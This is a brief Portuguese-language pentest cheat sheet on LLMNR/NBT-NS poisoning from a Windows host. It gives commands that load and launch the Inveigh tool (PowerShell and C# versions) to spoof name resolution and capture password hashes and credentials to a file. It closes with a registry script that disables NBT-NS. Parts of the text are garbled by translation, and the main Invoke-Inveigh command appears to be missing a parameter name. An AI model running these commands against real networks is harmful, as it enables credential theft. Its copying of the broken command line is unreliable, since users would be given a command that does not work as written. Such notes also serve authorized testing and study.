LLMNR/NBT-NS Poisoning - from Windows

Inveigh

O Inveigh conduz ataques de spoofing e capturas de hash/credenciais por meio de sniffing de pacotes e listeners/sockets específicos de protocolo.

  • Usando o Import-Modulecmd-let do PowerShell para importar a ferramenta baseada no Windows Inveigh.ps1.

Import-Module .\Inveigh.ps1	
  • Usado para gerar muitas das opções e funcionalidades disponíveis com Invoke-Inveigh. Executado a partir de um host baseado em Windows

(Get-Command Invoke-Inveigh).Parameters	
  • Inicia Inveighem um host baseado em Windows com falsificação de LLMNR e NBNS habilitada e envia os resultados para um arquivo.

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
  • Inicia a C#implementação de Inveighum host baseado em Windows.

.\Inveigh.exe
  • Script do PowerShell usado para desabilitar o NBT-NS em um host Windows.

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

Last updated